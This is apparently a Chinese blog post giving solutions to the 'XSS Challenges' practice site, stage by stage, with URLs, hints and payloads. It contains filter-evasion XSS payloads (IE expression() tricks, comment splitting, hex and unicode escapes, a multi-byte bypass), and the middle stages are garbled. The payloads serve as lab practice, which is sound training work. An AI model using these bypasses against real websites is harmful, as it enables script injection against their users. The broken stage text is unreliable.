XSS Challenges


http://xss-quiz.int21h.jp/
Notes (for all stages):
* NEVER DO ANY ATTACKS EXCEPT XSS.
* DO NOT USE ANY AUTOMATED SCANNER (AppScan, WebInspect, WVS, ...)
* Some stages may fit only IE.

Stage #1:
地址: http://xss-quiz.int21h.jp/?sid=7b2ec32a44f5676dbc2ad38d82708b4e48d596df
提示: very simple...
方案: Xssss""Xssss

Stage #2:
地址: http://xss-quiz.int21h.jp/stage2.php?sid=4998593ac8245a1e877a2c16905603858fa94e8f
提示: close the current tag and add SCRIPT tag...
方案: Xssss">

方案: p1=Xssss">Xssss
\"\']//g;"
方案: ``οnfοcus=alert(document.domain)

Stage #13: STYLE
地址: http://xss-quiz.int21h.jp/stage13_0.php?sid=9b00913b1a60ca6344c1f26a6d352af3d7ee4c72
提示: style attribute
方案: background-color:salmon;input:expression(javascript:alert(document.domain)) IE循环弹框
方案: background-color:salmon;input:expression((window.x==1)?'':(window.x=1,alert(document.domain)))

Stage #14: STYLE 注释符
地址: http://xss-quiz.int21h.jp/stage-_-14.php?sid=a629a8aaa2a217f28046edb7722a9083f4612419
提示: s/(url|script|eval|expression)/xxx/ig;
方案: background-color:salmon;input:e/**/xpression((window.x==1)?'':(window.x=1,alert(document.domain)))

Stage #15: 过滤--转码
地址: http://xss-quiz.int21h.jp/stage__15.php?sid=0480521f1f39f182becacfbedf36210ca0140fe5
提示: document.write();
方案: hogehoge\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

Stage #16: 过滤--转码
地址: http://xss-quiz.int21h.jp/stage00000016.php?sid=9c7972a074c9caf57100746acaab2864cd2dff2e
提示: "document.write();" and "s/\\x/\\\\x/ig;"
方案: hogehoge\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

Stage #17:
地址: http://xss-quiz.int21h.jp/stage-No17.php?sid=53f40e41f2c7a0eef557e1f469e312e02aa0ddba
提示: multi-byte character
方案: p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

Stage #18:
地址: http://xss-quiz.int21h.jp/stage__No18.php?sid=66431e719a0b192f11d5c86252382c114ad7dda3
提示: us-ascii high bit issue

Stage #19:
地址: http://xss-quiz.int21h.jp/stage_--19.php?sid=e32c8f9cd60f79786b67defb896fad8a7c7f461a
提示: Twitter DomXss at Sep 24, 2010
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
其他过关方案:
http://blogs.tunelko.com/2013/12/02/xss-challenges/
http://blog.knownsec.com/Knownsec_RD_Checklist/xss/xss_quiz.txt

推荐:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

你可能感兴趣的:(Vulnerability,Analysis,Pentesting,Xss,Web,Applications)